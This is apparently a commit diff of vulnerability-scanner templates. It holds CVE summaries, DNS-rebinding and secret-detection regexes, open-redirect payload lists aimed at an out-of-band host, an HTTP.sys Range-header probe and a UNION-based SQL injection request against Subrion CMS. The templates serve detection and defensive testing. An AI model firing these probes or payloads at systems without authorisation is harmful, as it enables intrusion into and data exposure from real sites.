{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
24979948d83a1e549dbe56133dba3db5
d1c0809e63305403ca431401cfcebe07

30
dns/dns-rebinding.yaml
View File

@ -1,5 +1,4 @@
id: dns-rebinding
info:
name: DNS Rebinding Attack
author: ricardomaia
@ -10,6 +9,8 @@ info:
- https://capec.mitre.org/data/definitions/275.html
- https://payatu.com/blog/dns-rebinding/
- https://heimdalsecurity.com/blog/dns-rebinding/
metadata:
max-request: 2
tags: redirect,dns,network
dns:
@ -20,7 +21,7 @@ dns:
- type: regex
part: answer
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
extractors:
- type: regex
@ -28,35 +29,22 @@ dns:
name: IPv4
group: 1
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- name: "{{FQDN}}"
type: AAAA
matchers:
# IPv6 Compressed
# IPv6 Compressed and Full
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
# IPv6
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
extractors:
- type: regex
part: answer
name: IPv6_Compressed
name: IPv6_ULA
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
- type: regex
part: answer
name: IPv6
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950

10
file/js/js-analyse.yaml
View File

@ -18,7 +18,7 @@ file:
- type: regex
name: extracted-token
regex:
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\s)*(:|=)+"
- type: regex
name: extracted-endpoints
@ -30,5 +30,9 @@ file:
- type: regex
name: extracted-uri
regex:
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+"
# digest: 4a0a00473045022074fd41f8b59517248d39216756a55be729fe598400825417fc9ab281c4c626d6022100f3a770bad05731314a45020b4a94b393b96dfae3590e0e526327ac84fa760aa2:922c64590222798bb761d5b6d8e72950
- "(?i)([a-z]{2,10}):(//|/)[a-z0-9\\./?&-_=:]+"
- type: regex
name: AMAZON-ACCES-KEY
regex:
- "(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
# digest: 4a0a0047304502200738658ef4985c1261c662fd545a23504b402343ad994af584866d74d37e11ac022100c8213e439b8a574bee55ce0881363c0964830df8255bcd89249d37a778f038ba:922c64590222798bb761d5b6d8e72950

4
file/keys/linkedin-id.yaml
View File

@ -1,4 +1,4 @@
id: linkedin-client-id
id: linkedin-id
info:
name: Linkedin Client ID
@ -13,4 +13,4 @@ file:
- type: regex
regex:
- "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}"
# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950

5
headless/cves/2018/CVE-2018-25031.yaml
View File

@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-25031
cwe-id: CWE-20
epss-score: 0.00265
epss-percentile: 0.64105
epss-percentile: 0.65414
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -30,7 +30,6 @@ info:
shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057"
tags: headless,cve,cve2018,swagger,xss,smartbear
headless:
- steps:
- args:
@ -71,4 +70,4 @@ headless:
words:
- "swagger"
case-insensitive: true
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950

9
headless/headless-open-redirect.yaml
View File

@ -21,9 +21,6 @@ headless:
- action: waitload
payloads:
redirect:
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
- '%09/oast.live/'
- '%5C%5Coast.live/%252e%252e%252f'
- '%5Coast.live'
@ -112,10 +109,14 @@ headless:
- 'cgi-bin/redirect.cgi?oast.live'
- 'out?oast.live'
- 'login?to=http://oast.live'
- '#/oast.live'
- '%0a/oast.live/'
- '%0d/oast.live/'
- '%00/oast.live/'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "Interactsh Server"
# digest: 4b0a00483046022100a8c70dc73a12a3a282a012774a3a10a99f153d80d4c16a01f2bb4bd9770903dc022100f491074035d26885797db4152bad2ecd436ebf4d1f7fa479d402303ceac17db0:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950

2430
helpers/wordlists/wordpress-plugins.txt
View File

File diff suppressed because it is too large Load Diff

33
http/cnvd/2023/CNVD-2023-96945.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CNVD-2023-96945
info:
name: McVie Safety Digital Management Platform - Arbitrary File Upload
author: DhiyaneshDk
severity: high
description: |
Jiangsu Maiwei Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.
reference:
- https://blog.csdn.net/weixin_42628854/article/details/136036109
metadata:
verified: true
max-request: 1
fofa-query: "安全生产数字化管理平台"
tags: cnvd,cnvd2023,file-upload,mcvie
http:
- method: GET
path:
- "{{BaseURL}}/Content/Plugins/uploader/FileChoose.html"
matchers-condition: and
matchers:
- type: word
words:
- "选择文件"
- "提交"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950

6
http/cves/2014/CVE-2014-6271.yaml
View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
epss-score: 0.97564
epss-percentile: 0.99999
epss-score: 0.97559
epss-percentile: 0.99997
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata:
max-request: 8
@ -58,4 +58,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950

4
http/cves/2014/CVE-2014-8799.yaml
View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799
cwe-id: CWE-22
epss-score: 0.17844
epss-percentile: 0.95686
epss-percentile: 0.96002
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950

47
http/cves/2015/CVE-2015-1635.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
reference:
- https://www.exploit-db.com/exploits/36773
- https://www.securitysift.com/an-analysis-of-ms15-034/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1635
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10.0
cwe-id: CWE-94
cve-id: CVE-2015-1635
cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: microsoft
product: windows_7
shodan-query: '"Microsoft-IIS" "2015"'
tags: cve,cve2015,kev,microsoft,iis,rce
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
Range: "bytes=0-18446744073709551615"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HTTP Error 416"
- "The requested range is not satisfiable"
condition: and
- type: word
part: header
words:
- "Microsoft"
# digest: 4b0a0048304602210089c354040a56574a5a17f803370b94a87244e98159c6eff1b1b07f666e2c834a022100936fbfa7282962b47f7de82e84e67d0cc32921b313c84406269eef740f6ccec0:922c64590222798bb761d5b6d8e72950

4
http/cves/2015/CVE-2015-2794.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2015-2794
info:
name: DotNetNuke 07.04.00 - Administration Authentication Bypass
author: 1337kro
author: 0xr2r
severity: critical
description: |
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221008832d97a34293638b4c086c5a28aff802fdb47075161daec024897821ed9922b02202ce97274853804157a6224c3711bc0fb0fa9f58c60aef8297fc5f8747126c182:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205b931368f972e054b081418fdcdbd6d16c6c7a1ef76a663c0d9db9d8c3fc353f02207c5737d6057af1e35c3ca3e3687a60ef1bf3ba7e59e7d90e9a39bd6fabc3213a:922c64590222798bb761d5b6d8e72950

10
http/cves/2017/CVE-2017-11444.yaml
View File

@ -27,19 +27,23 @@ info:
product: subrion_cms
tags: cve2017,cve,sqli,subrion,intelliants
variables:
string: "{{to_lower(rand_base(5))}}"
hex_string: "{{hex_encode(string)}}"
http:
- method: GET
path:
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "projectdiscovery.io"
- '{{string}}'
- type: status
status:
- 200
# digest: 4a0a004730450221008122f5a7f1c537936474771ca8cbc773e4fd522783e15948324010c182882d44022034bde42890c4acf5f2806b5e320405129f41263dcbf69b64ef49635cf58d8e0d:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950

4
http/cves/2017/CVE-2017-17562.yaml
View File

@ -28,7 +28,7 @@ info:
max-request: 65
vendor: embedthis
product: goahead
tags: cve,cve2017,rce,goahead,brute-force,kev,vulhub,embedthis
tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis
http:
- raw:
@ -117,4 +117,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022047ce66d8caa4a42f359d87b562ccfd3702d82b3e5306d17049fc7572d66bc16c022100bf004dc58ed2839f05b495f4434442d941c1de5236150a6fd3606381073f7ed5:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950

6
http/cves/2018/CVE-2018-17431.yaml
View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287
epss-score: 0.11315
epss-percentile: 0.94677
epss-score: 0.11416
epss-percentile: 0.95073
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
metadata:
max-request: 2
